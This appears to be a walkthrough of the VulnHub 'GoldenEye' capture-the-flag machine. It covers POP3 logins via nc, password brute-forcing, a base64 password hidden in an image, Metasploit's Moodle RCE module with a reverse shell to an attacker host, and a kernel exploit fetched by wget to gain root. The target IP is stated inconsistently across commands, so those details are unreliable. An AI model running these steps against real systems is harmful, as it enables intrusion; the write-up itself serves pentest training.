In this article, we will continue the “GoldenEye” Capture-The-Flag challenge. This CTF was posted on VulnHub by its author, Creosote. As per the description given by the author, this is an intermediate-level machine designed as one of the OSCP vulnerable machines. The goal of this challenge is to read the flags in the root directory.

We have already set up a pentesting environment for this machine in Part One of this CTF. You can check out the first part of this CTF here.

The target machine IP address for this CTF is 109.168.1.10.

Please Note: The target and attacker machine IP addresses may be different, depending on your network configuration.

In the previous article, we learned to exploit the POP service on the target machine and log in as different users. We also read the emails of different users on the server through the POP3 port. During this, we found a username and password from a user’s email, and there were instructions to make some changes in the etc/hosts file. The email can be seen in the following screenshot.

So let’s proceed from this point.

It’s mentioned in the above message that we need to point the target machine IP address to the given URL in etc/hosts. Let’s do that now.

Command Used:

  • echo 168.1.10 severnaya-station.com >> /etc/hosts (It will add the entry in the host file. The highlighted IP address is the target machine IP address which could be different as per your network configuration.)
  • cat /etc/hosts (To verify the change)

In the above screenshot, we can see that the URL has been successfully added on the target machine. So let’s open this URL on the browser.

After so much effort, we finally have the web application running on the target machine. And thanks to the last email we saw, we already have valid user’s credentials on this application. So let’s try to log into the application with these credentials. It can be seen in the following screenshot:

Credentials:

  • Username: xenia
  • Password: RCP90rulez!

In the above screenshot, it can be seen that the credentials worked, and we are now logged into the application.

While exploring the application, I found another user’s chat in the message section where a “username” was mentioned. It can be seen in the following screenshot.

From the previous passwords and hints from the application, we know that all the users are using weak passwords which can be brute-forced. So I again used the Hydra utility to enumerate the password for the newly-identified user.

You can see that the tool has successfully cracked the password for the user “doak,” which is “goat.” Let’s try to log in with these credentials on the POP port.

Command Used:

  • nc 192.168.1.10 55007
  • USER doak
  • PASS goat
  • LIST
  • RETR 1

As seen in the above screenshot, we have successfully logged in through the POP port as user “doak.” There was one message, giving us more login credentials to log into the application. Let’s try to login with these credentials.

Credentials: dr_doak
Password: 4England!

In the screenshot, it can be seen that we have logged in as user “dr_doak” in the application. I started exploring the application for any further clue. After looking around for a while, I found another private file:

In the above screenshot, the private file has been highlighted. I downloaded the “s3cret.txt” file from the target machine and opened it with Notepad.

Now we can view the contents of the file. There is an interesting hint given that states that the admin credentials were hidden in an image file. Let’s open the image on the browser to see its contents.

In the above screenshot, the image file can be seen, but it did not give any information. So I downloaded this image for further analysis and listed all the strings in the file by using the strings utility of Kali Linux. It can be seen in the following screenshot.

Command Used:

In the above screenshot, there is a base-64 encoded string (two equal signs indicate that it is a base-64 encoded string) highlighted with red.  The base 64 encoded string is given below:

EFdpbnRlcjE5OTV4IQ==

Let’s decode this string using Burp Decoder.

After decoding the base-64 string, we got a plain text string that can be seen in the above screenshot. As mentioned in the clue, we know that this is the password of an admin user. Let’s log into the application as an admin user now with the following credentials.

  • Username Admin
  • Password xWinter1995x!

In the above screenshot, we can see that the credentials worked and we are now logged into the application as an admin user. Now we have the admin access of the application on the target machine, but our main goal is to get the root access of the target machine.

I went on to explore the application as an admin user. However, I did not find any clues in the application which may lead to further exploitation. So I went back to basics. We can see that the application name is “Moodle” and it is using version 2.2.3 it can also be seen in the following screenshot.

URL: http://severnaya-station.com/gnocertdir/admin/environment.php

After getting the version name, I did a quick search for available exploits on Google. There were some interesting results:

As you can see, there are a lot of exploits available for this version. Since we need to get shell access on the target machine, I chose to use Remote Code Execution (RCE) exploit. In the above screenshot we can see that a Metasploit Module is also available for this exploit. So let’s configure Metasploit for the same.

In the above screenshot it can be seen that we have set the exploit in the Metasploit. Now let’s configure the required data to execute the exploit:

Command Used:

  • set username admin
  • set password xWinter1995x!
  • set rhost severnaya-station.com
  • set targeturi /gnocertdir
  • set payload cmd/unix/reverse
  • set lhost 192.168.1.45
  • set lport 4444

Now we have set all the required details. After setting the options, the final exploit will look like the following screenshot:

Now let’s launch the exploit to get the command line access of the target system.

In the above screenshot, we can see that the exploit was successful. We finally have the reverse shell of the target machine! But when I run the id command, it shows that this is not a root user; it was low-privilege user which is www-data.

I ran some more commands to check the operating system and kernel version of the target machine:

We can see in the above screenshot that we have the operating system and kernel version number. So I searched on Google for a local exploit and found several options.

I used the first exploit and downloaded it into the target machine’s “temp” folder. It can be seen in the following screenshot.

In the above screenshot, we can see that the exploit has been downloaded as “37292.c” on the target machine. Then I used the GCC compiler to compile this exploit on the target machine, but unfortunately the GCC compiler was not available on the target machine. (See above.) So instead, I decided to use the CC compiler to compile the code on the target machine. It can be seen in the following screenshot.

You can see that the exploit has been compiled with a few error warnings.  Let’s try to execute the exploit on the target machine. It can be seen in the following screenshot.

You can see that the complied exploit could not be executed successfully. I checked the exploit to look for any possible ways to execute it and saw that the exploit was using another GCC command for compilation. Since GCC was not available on the target machine, I modified the exploit and changed the “gcc” to “cc.”

After saving the changes in the exploit, we need to compile it again with the CC complier and try to execute it. It can be seen in the following screenshot:

After modifying the exploit on my local machine, I used the wget utility to transfer the exploit from my local machine to the target machine. This can be seen in the above screenshot. After that, I again recompiled it by using the CC complier and executed it. This time, the exploit was successfully executed. This provided me the root access of the target machine.

In the above screenshot, we can see that we have the root access of the target machine. This is confirmed by the id command.

According to the description of the challenge, the goal is to get two flags from the target machine. This was not a difficult task, as both the flags were in the root directory. Let’s read the flags.

You can see that there is a path given for the second flag. So let’s run this on the browser to read its contents.

We did it!

As we have successfully read both the flag files, this completes the CTF. I hope you enjoyed this machine! Stay tuned for more challenging machines to practice your pentesting skills.

Sources

POP3 Commands, The Electric Toolbox

Moodle – Remote Command Execution (Metasploit), Exploit Database

Vulnerability & Exploit Database, Rapid7

Linux Kernel 3.13.0 < 3.19, Exploit Database